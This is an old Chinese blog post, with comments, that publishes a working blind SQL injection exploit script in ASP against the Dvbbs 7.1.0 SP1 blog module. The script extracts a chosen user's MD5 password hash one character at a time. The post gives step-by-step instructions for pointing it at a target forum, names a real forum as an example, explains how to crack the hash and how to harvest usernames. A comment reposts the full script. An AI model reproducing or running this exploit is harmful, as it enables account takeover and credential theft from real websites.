|
动网博客漏洞利用Powered By Dvbbs Version 7.1.0 Sp1
樱木花盗 发表于 2008-2-13 2:08:14 |
动网博客漏洞利用Powered By Dvbbs Version 7.1.0 Sp1
源码如下:
<br><br>
<br><br>
<center>
<div align='left' style="width:500px;font-size:12px;">
<%
Server.ScriptTimeout=300
Response.Buffer = True
Dim hehefulsh
Dim charhex,OpenURL,templen,tempstr,newgetlen,theoffset,theURL,TheUser
Set hehefulsh = CreateObject("Microsoft.XMLHTTP")
charhex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")
tempstr=""
for total=0 to 15
for theoffset=0 to 15
templen=0
OpenURL="http://www.03389.com/boke.asp?admin'and'" & tempstr & charhex(theoffset) & "'=left
(password," &total+1& ")and''='.index.html.index.html"
hehefulsh.Open "Get",OpenURL, False, "", ""
hehefulsh.Send
GetPage = BytesToBstr(hehefulsh.ResponseBody)
If InStr(GetPage,"该博客用户不存在或填写的资料有误!")=0 Then
tempstr=tempstr & charhex(theoffset)
response.write "前" & total+1 & "位MD5值为:" & tempstr & " 其他密码正在读取中,请等待。。。<BR>"
Response.Flush
Exit for
End if
Next
Next
response.write "<br><br><br>成功读取密码的MD5值,为:" & tempstr & " <BR><BR><BR>请不要使用本程序
进行破坏行为!"
Set hehefulsh = Nothing
Function BytesToBstr(body)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = "GB2312"
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
%>
</div>
</center>
使用方法如下:
1>
新建一个.asp空白页面,把上面代码拷贝进去。
2>
把
OpenURL="http://www.03389.com/boke.asp?admin'and'" & tempstr & charhex(theoffset) & "'=left
(password," &total+1& ")
这一行中的http://www.03389.com/boke.asp 修改为你要攻击的动网地址
将 admin 改为您要读取密码的用户ID
举个例子:
bbs.51nahan.com这个论坛采用的是动网7.1 SP1系统
你要得到的是user这个用户的密码
那么就把
OpenURL="http://www.03389.com/boke.asp?admin'and'" & tempstr & charhex(theoffset) & "'=left
(password," &total+1& ")
改成
OpenURL="http://bbs.51nahan.com/boke.asp?user'and'" & tempstr & charhex(theoffset) & "'=left
(password," &total+1& ")
3>
把这个文件放在本地或远程站点,都行。(刚开始速度可能会有点慢,但绝对可以读取出来,得到的密码是MD5
加密过的,可以到www.cmd5.com进行解密)。
小技巧:
http://对方的论坛网址/bokeindex.asp
这是动网博客的首页
在这里面显示的有开通博客的用户名字
你可以把上面例子中的admin换成他们
嘿嘿!!! |
|
厨子做的角也
learkka(游客)发表评论于2009-10-11 21:45:39 |
| efliyrhhb-->别人想得到的解彼此更无感上睡得好不好 |
|
Re:动网博客漏洞利用Powered By Dvbbs Version 7.1.0 Sp1
gf(游客)发表评论于2012-8-9 14:37:48 |
<br><br>
<br><br>
<center>
<div align='left' style="width:500px;font-size:12px;">
<%
Server.ScriptTimeout=300
Response.Buffer = True
Dim hehefulsh
Dim charhex,OpenURL,templen,tempstr,newgetlen,theoffset,theURL,TheUser
Set hehefulsh = CreateObject("Microsoft.XMLHTTP")
charhex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")
tempstr=""
for total=0 to 15
for theoffset=0 to 15
templen=0
OpenURL="http://www.03389.com/boke.asp?admin'and'" & tempstr & charhex(theoffset) & "'=left
(password," &total+1& ")and''='.index.html.index.html"
hehefulsh.Open "Get",OpenURL, False, "", ""
hehefulsh.Send
GetPage = BytesToBstr(hehefulsh.ResponseBody)
If InStr(GetPage,"该博客用户不存在或填写的资料有误!")=0 Then
tempstr=tempstr & charhex(theoffset)
response.write "前" & total+1 & "位MD5值为:" & tempstr & " 其他密码正在读取中,请等待。。。<BR>"
Response.Flush
Exit for
End if
Next
Next
response.write "<br><br><br>成功读取密码的MD5值,为:" & tempstr & " <BR><BR><BR>请不要使用本程序
进行破坏行为!"
Set hehefulsh = Nothing
Function BytesToBstr(body)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = "GB2312"
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
%>
</div>
</center> |
|
发表评论:
|
